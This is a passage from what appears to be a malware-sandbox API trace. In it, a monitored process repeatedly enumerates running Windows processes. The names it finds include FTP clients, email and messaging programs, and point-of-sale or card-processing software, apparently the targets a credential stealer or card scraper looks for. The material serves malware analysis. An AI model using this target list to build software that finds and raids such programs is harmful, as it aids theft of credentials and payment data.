th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0229.061] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0229.063] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0229.066] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0229.069] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0229.071] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0229.073] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0229.075] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0229.120] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0229.122] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0229.124] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0229.126] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0229.132] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0229.134] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0229.136] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0229.138] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0229.140] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0229.179] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0229.182] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0229.185] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0229.188] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0229.191] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0229.193] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0229.235] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0229.238] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0229.241] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0229.243] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0229.246] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0229.248] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0229.251] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0229.254] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0229.257] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0229.259] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0229.262] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0229.265] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0229.268] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0229.277] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0229.279] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0229.283] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0229.286] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0229.288] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0229.291] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0229.296] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0229.299] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0229.302] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0229.304] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0229.306] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x25c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0229.309] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0229.312] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0229.319] CloseHandle (hObject=0x2200) returned 1 [0229.319] Sleep (dwMilliseconds=0x64) [0229.433] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2250 [0229.450] Process32First (in: hSnapshot=0x2250, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0229.453] Process32Next (in: hSnapshot=0x2250, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x76, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0229.455] Process32Next (in: hSnapshot=0x2250, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0229.458] Process32Next (in: hSnapshot=0x2250, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0229.460] Process32Next (in: hSnapshot=0x2250, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0229.463] Process32Next (in: hSnapshot=0x2250, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0229.465] Process32Next (in: hSnapshot=0x2250, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0229.467] Process32Next (in: hSnapshot=0x2250, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0229.509] Process32Next (in: hSnapshot=0x2250, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0229.512] Process32Next (in: hSnapshot=0x2250, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0229.515] Process32Next (in: hSnapshot=0x2250, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0229.517] Process32Next (in: hSnapshot=0x2250, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0229.519] Process32Next (in: hSnapshot=0x2250, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0229.522] Process32Next (in: hSnapshot=0x2250, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0229.525] Process32Next (in: hSnapshot=0x2250, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0229.527] Process32Next (in: hSnapshot=0x2250, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0229.529] Process32Next (in: hSnapshot=0x2250, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0229.531] Process32Next (in: hSnapshot=0x2250, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0229.533] Process32Next (in: hSnapshot=0x2250, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0229.536] Process32Next (in: hSnapshot=0x2250, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0229.538] Process32Next (in: hSnapshot=0x2250, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0229.540] Process32Next (in: hSnapshot=0x2250, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x31, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0229.542] Process32Next (in: hSnapshot=0x2250, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0229.583] Process32Next (in: hSnapshot=0x2250, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0229.587] Process32Next (in: hSnapshot=0x2250, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0229.589] Process32Next (in: hSnapshot=0x2250, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0229.591] Process32Next (in: hSnapshot=0x2250, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0229.594] Process32Next (in: hSnapshot=0x2250, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0229.596] Process32Next (in: hSnapshot=0x2250, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0229.599] Process32Next (in: hSnapshot=0x2250, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0229.601] Process32Next (in: hSnapshot=0x2250, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0229.604] Process32Next (in: hSnapshot=0x2250, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0229.606] Process32Next (in: hSnapshot=0x2250, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0229.608] Process32Next (in: hSnapshot=0x2250, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0229.611] Process32Next (in: hSnapshot=0x2250, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0229.614] Process32Next (in: hSnapshot=0x2250, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, 